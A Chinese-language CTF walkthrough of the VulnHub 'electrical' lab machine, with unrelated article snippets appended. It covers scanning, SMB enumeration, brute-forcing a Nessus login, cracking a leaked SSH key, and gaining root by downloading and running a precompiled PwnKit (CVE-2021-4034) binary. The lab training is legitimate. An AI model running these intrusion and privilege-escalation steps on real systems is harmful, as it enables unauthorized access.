vulnhub靶場【digitalworld.local系列】的electrical靶機

前言

靶機:digitalworld.local-electrical,IP地址為192.168.10.12,后期因為卡頓,重新安裝,ip地址后面為192.168.10.11

攻擊:kali,IP地址為192.168.10.6

kali采用VMware虛擬機,靶機選擇使用VMware打開文件,都選擇橋接網絡

這里官方給的有兩種方式,一是直接使用virtualbox加載,另一種是通過VMware直接加載,也給出了iso鏡像文件。

文章中涉及的靶機,來源于vulnhub官網,想要下載,可自行訪問官網下載,或者通過網盤下載https://pan.quark.cn/s/86cf8a398835

主機發現

使用arp-scan -lnetdiscover -r 192.168.10.1/24掃描

也可以使用nmap等工具進行

信息收集

使用nmap掃描端口

掃描tcp端口,并保存于nmap-tcp

nmap -sT 192.168.10.12 --min-rate=1000 -p- -oA nmap-tcp

掃描常見的20個udp端口,不過這里的端口大部分都是不確定的情況

nmap -sU 192.168.10.12 --top-ports 20 -T4 -oA nmap-udp

把前面掃描出的tcp、udp端口,進行處理,只取端口號

grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','
#這里就是包括可能開放的端口都不要,因為是靶機,可能過濾的話,也會無法進一步掃描
ports=22,80,8080,68,69,138,161,631,1434,1900

對特定的端口號進行深入探測

nmap -sV -O -sC -sT 192.168.10.12 -p $ports -oA detail

使用腳本檢測有無漏洞

nmap --script=vuln 192.168.10.12 -p $ports -oA vuln

SMB探測

使用enum4linux嘗試進行枚舉,發現兩個分享print$IPC$,并還有兩個用戶govindasamyelectrical

外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳

10

8834端口探測

這里需要注意,使用瀏覽器訪問時需要加上https協議

https://192.168.10.12:8834

查看頁面源代碼也沒有信息泄露,那么嘗試識別一下,使用whatweb測試

再使用瀏覽器插件wappalyzer識別

嘗試進行目錄爆破,可以使用dirbdirsearch進行測試

dirsearch -u https://192.168.10.12:8834 -x 403,404 -e js,txt,zip,bak,cfm,dbm

發現有api,訪問之后,發現有很多功能

測試這些api功能后,基本上都是需要登錄的,無意義

網站密碼爆破

嘗試進行抓取數據包然后爆破,以前面兩個用戶名為測試,我這里是使用burp

選擇攻擊點、攻擊模式、以及字典的選擇

這里的默認字典,只有burp pro版本中有,若使用社區版,可以加載密碼字典,比如加載kali中的/usr/share/wordlists/fasttrack.txt字典或rockyou.txt也行

開始攻擊后,等一會即可發現成功獲取一個,用戶名govindasamy和弱密碼password

敏感信息泄露

下面的靶機因為重裝,ip地址更改為192.168.10.11

輸入密碼進行登錄,登錄后發現是nessus的漏洞掃描的web界面,之前也搜索過對應版本的nessus漏洞,發現并沒有可利用的,那么在這個web ui界面進行探測。

這里建議使用burp抓取全程的數據包

在測試scan中的credentialed check時,點擊其配置configuration,發現一個文本域,向下居然有內容,并且還是某一個的私鑰,這個可能是靶機上的,也只是可能,需要進一步測試

把這個內容復制并保存在kali中的一個文件中

并且在配置中,默認的賬戶就是electrical

嘗試進行登錄可以明顯的看到,對私鑰進行了加密操作

chmod 600 id1
ssh electrical@192.168.10.11 -p 22222 -i id1

這里先使用john進行破解測試

ssh2john id1 > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

可以看到密碼就是用戶名,嘖,之前好像在哪里看到過,好像在burp抓包的時候與發現ssh私鑰的同一界面,不過無所謂了

靶機內信息收集

使用ssh進行登錄

查看local.txt文件

查看當前靶機內有哪些用戶

ls -al /home
cat /etc/passwd | grep /bin/bash

查看網絡狀態連接

ss -antulp
netstat -antulp

查看ip地址狀態

ip add

查看系統進程

ps aux | grep root
top

使用find尋找具有SUID權限的文件

find / -perm -u=s -type f 2>/dev/null

發現有sudo,但是這里不知道electrical的密碼,測試后,發現果然需要密碼,所以暫時擱置

查看內核版本及系統版本

uname -a
uname -r 
cat /etc/issue
cat /etc/*release
lsb_release

查看定時任務

crontab -l
cat /etc/crontab
atq

注意,下面的腳本上傳,都是我個人kali的路徑,所以要自行更改的,并且下面的腳本都是在github上的項目,可自行去搜索下載。當然為了自己方便,我會放置在自己的網盤中的

通過scp上傳pspy64檢測是否有隱藏的任務

#在kali上執行該命令,通過scp傳輸
scp -P 22222 -i ../digital/electrical/id1 pspy64 electrical@192.168.10.11:/tmp

不過在靶機上執行pspy64后,并未有什么發現

那么再上傳一個腳本linpeas.sh,用于檢測

#在kali上執行該命令,通過scp傳輸
scp -P 22222 -i ../digital/electrical/id1 linpeas.sh electrical@192.168.10.11:/tmp

檢測后,也是沒有任何收獲,不過還是看到一些東西,如第三方工具gcc等,并沒有安裝,也就表示無法在靶機內編譯文件,也看到了可能存在的漏洞

提權

之前經過使用find尋找具有SUID權限文件時,發現有/usr/libexec/polkit-agent-helper-1/usr/bin/pkexec,結合前面的pwnkit漏洞的發現,也就是CVE-2021-4034,猜測也許可以利用

通過AI搜索,以下為內容

CVE-2021-4034(PwnKit)漏洞:

? 主要利用了具有 SUID 權限的 /usr/bin/pkexec 文件來實現提權

pkexec 是 PolicyKit 提供的一個工具,用于以特權用戶(通常是 root)身份執行命令。

PolicyKit 是一個用于在 Linux 系統上管理特權操作的框架,pkexec 本身被設計為一個安全機制,用于在用戶請求執行特權操作時進行權限驗證。

然而,CVE - 2021 - 4034 漏洞的存在使得攻擊者可以繞過 pkexec 的權限驗證機制。該漏洞是由于 pkexec 在處理環境變量時存在緩沖區溢出漏洞,攻擊者可以構造惡意的環境變量,使得 pkexec 在執行過程中出現內存錯誤,從而改變程序的執行流程,最終以 root 權限執行任意命令。

下面是github中的一些poc,因為這里無法直接在靶機編譯,所以使用編譯好的文件,github項目地址為https://github.com/ly4k/PwnKit

采用這個編譯好的

首先下載到kali中,然后通過scp下載到靶機內

#下載
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit#傳輸
scp -P 22222 -i /id1 PwnKit electrical@192.168.10.11:/tmp

然后在靶機上加上執行權限后直接執行

chmod +x PwnKit
./PwnKit

提權成功,查看/root目錄下的文件

總結

該靶機的考察如下:

  1. 對于不存在漏洞的網站,并且需要登錄才能看到內容,而且不支持注冊的網站,或許爆破是最好的手段了,這里的爆破不僅僅包括密碼爆破
  2. 存在smb服務的,都可以枚舉一下用戶,這個會有用處的
  3. 對于網站中的信息,也就是每一個模塊,最好就是通過burp抓取數據包,至少要有歷史記錄,這樣復盤很輕松。且網站中可能存在的隱藏信息,不一定通過頁面源代碼就能看到,建議使用瀏覽器的開發者工具,這里就是通過發現了一個私鑰文件,才有下一步的
  4. ssh的私鑰文件,對于設置密碼的,可以通過john套件進行處理,ssh2john轉換,john破解
  5. 對于提權,這里借助的是幾個腳本pspy64、linpeas.sh發現的,當然還是配合find尋找到的SUID權限文件結合起來的。
  6. 考察pwnkit提權,也就是cve-2021-4034,這個可以通過github下載

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/71925.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/71925.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/71925.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

macos 程序 運行

sudo xattr -r -d com.apple.quarantine [/Applications/Name]使用stow 管理配置文件

多視圖幾何--結構恢復--三角測量

三角測量 1. 核心公式推導 假設兩個相機的投影矩陣為 P P P 和 P ′ P P′,對應的匹配圖像點(同名點)為 ( u , v ) (u, v) (u,v) 和 ( u ′ , v ′ ) (u, v) (u′,v′),目標是求解三維點 X [ X x , X y , X z , 1 ] T X [X_x, X_y, X_z, 1]^T X…

共享內存的原理和創建

目錄 共享內存的原理 共享內存的創建 代碼實現創建 共享內存的管理指令 我們今天來學習共享內存!!! 共享內存的原理 兩個進程同時使用內存中開辟的共享空間進行通信就是建立并使用共享內存進行進程間的通信。System V 共享內存&#xf…

3.10[A]cv

核心模塊: rasterizer:光柵化器,負責三角形遍歷和像素繪制Shader:包含頂點著色器和多種片元著色器Texture:紋理處理模塊 頂點著色器的計算量一般遠小于片元著色器。因為組成三角形的頂點相對有限,而片元需…

mac使用Homebrew安裝miniconda(mac搭建python環境),并在IDEA中集成miniconda環境

一、安裝Homebrew mac安裝brew 二、使用Homebrew安裝miniconda brew search condabrew install miniconda安裝完成后的截圖: # 查看是否安裝成功 brew list環境變量(無需手動配置) 先執行命令看能不能正常返回,如果不能正常…

多視圖幾何--相機標定--從0-1理解張正友標定法

1基本原理 1.1 單應性矩陣(Homography)的建立 相機模型:世界坐標系下棋盤格平面(Z0)到圖像平面的投影關系為: s [ u v 1 ] K [ r 1 r 2 t ] [ X Y 1 ] s \begin{bmatrix} u \\ v \\ 1 \end{bmatrix} K…

WWDG窗口看門狗原理

WWDG(窗口看門狗)在窗口期喂狗 作用: 原理: 框圖 WWDG寄存器: WWDG_CR控制寄存器 WWDG_CFR配置寄存器 狀態寄存器WWDG_SR 超時時間計算公式 最小最大超時值 HAL配置函數: 1. IWDG 和 WWDG 的區別 IWDG&…

無公網IP也能遠程控制Windows:Linux rdesktop內網穿透實戰

文章目錄 前言1. Windows 開啟遠程桌面2. Linux安裝rdesktop工具3. Win安裝Cpolar工具4. 配置遠程桌面地址5. 遠程桌面連接測試6. 設置固定遠程地址7. 固定地址連接測試 前言 如今遠程辦公已經從一種選擇變成了許多企業和個人的必修課,而如何在Linux系統上高效地訪…

Pygame實現射擊鴨子游戲3-2

2 鴨子類Target的創建 2.1 __init__()函數 Target類的__init__()函數代碼如圖5所示。 圖5 __init__()函數代碼 其中,第18行將Target類聲明為pygame.sprite.Sprite類的子類;第19行代碼中,__init__()函數的img_path參數表示鴨子圖片的文件名…

利用Java爬蟲獲取衣聯網商品詳情:實戰指南

在電商領域,獲取商品詳情是數據分析和市場研究的重要環節。衣聯網作為知名的電商平臺,提供了豐富的服裝商品資源。本文將詳細介紹如何利用Java編寫爬蟲程序,通過商品ID獲取衣聯網商品詳情。 一、準備工作 (一)環境搭…

五、OpenGL中Shader與C++數據傳輸

文章目錄 一、概述二、Shader 代碼文件的基本格式三、Shader的向量語法介紹四、Shader之間的數據傳輸五、Shader與C的數據傳輸uniform六、完整示例 一、概述 在 OpenGL 中,Shader(著色器)使用 GLSL(OpenGL Shading Language&…

【3DMAX插件】3DMAX建筑大師插件MasterBuilder使用方法

3DMAX建筑大師插件是一款專為3DMAX設計的程序化(參數化)建筑建模工具,其最大特點是能夠一鍵生成建筑模型,極大地提升了工作效率。該插件配備了多種結構控制選項,涵蓋陽臺、門窗、欄桿、樓頂水塔等附屬建筑元素&#xf…

隱私保護在 Facebook 用戶身份驗證中的應用

在這個數字化的時代,個人隱私保護成為了公眾關注的焦點。社交媒體巨頭 Facebook 作為全球最大的社交平臺之一,擁有數十億用戶,其在用戶身份驗證過程中對隱私保護的重視程度直接影響著用戶的安全感和信任度。本文將探討 Facebook 在用戶身份驗…

Swift Package Manager (SPM) 創建并集成本地庫

在macOS 項目中,使用 Swift Package Manager (SPM) 創建并集成本地庫的完整步驟。 創建一個macos應用程序,選擇 swift、oc、swiftui都可以。 創建好應用之后,開始創建SPM本地庫。 打開終端app,進入項目根目錄,逐次輸…

滲透測試之利用sql拿shell(附完整流程+防御方案)【下】

導讀: 時刻保持謙遜,始終保持學習,探尋事物的本質,不要把事情復雜化 話不多說,書接上回 三、利用日志getshell 利用條件: 擁有網站的寫入權限知道網站的絕對路徑數據庫日志開啟 實際操作: (1)查看數據庫日志是否開啟以及路徑 show variables like %general%; (2…

LeetCode 熱題 100_每日溫度(72_739_中等_C++)(棧)(暴力破解;棧(從左到右);棧(從右到左))

LeetCode 熱題 100_每日溫度(72_739) 題目描述:輸入輸出樣例:題解:解題思路:思路一(暴力破解法(雙重循環)):思路二(棧:從左到右)&…

【HarmonyOS Next之旅】DevEco Studio使用指南(二)

目錄 1 -> 工程模板介紹 2 -> 創建一個新的工程 2.1 -> 創建和配置新工程 2.1.1 -> 創建HarmonyOS工程 2.2.2 -> 創建OpenHarmony工程 1 -> 工程模板介紹 DevEco Studio支持多種品類的應用/元服務開發,預置豐富的工程模板,可以根…

unity3d 背景是桌面3d數字人,前面是web的表單

是可以實現的,但涉及多個技術棧的結合,包括 Unity3D、Web 技術(HTML、JavaScript)、以及可能的 WebGL 或 WebRTC 技術。大致有以下幾種實現方案: 方案 1:Unity 作為獨立應用(桌面端&#xff0…

貓耳大型活動提效——組件低代碼化

1. 引言 貓耳前端在開發活動的過程中,經歷過傳統的 pro code 階段,即活動頁面完全由前端開發編碼實現,直到 2020 年接入公司內部的低代碼活動平臺,滿足了大部分日常活動的需求,運營可自主配置活動并上線,釋…

深度學習系列79:Text2sql調研

參考 https://github.com/topics/text-to-sql 這里是一些資源:https://github.com/eosphoros-ai/Awesome-Text2SQL/blob/main/README.zh.md 這里是綜述文章:https://zhuanlan.zhihu.com/p/647249972 1. 數據集 Spider: 一個跨域的復雜text2sql數據集&a…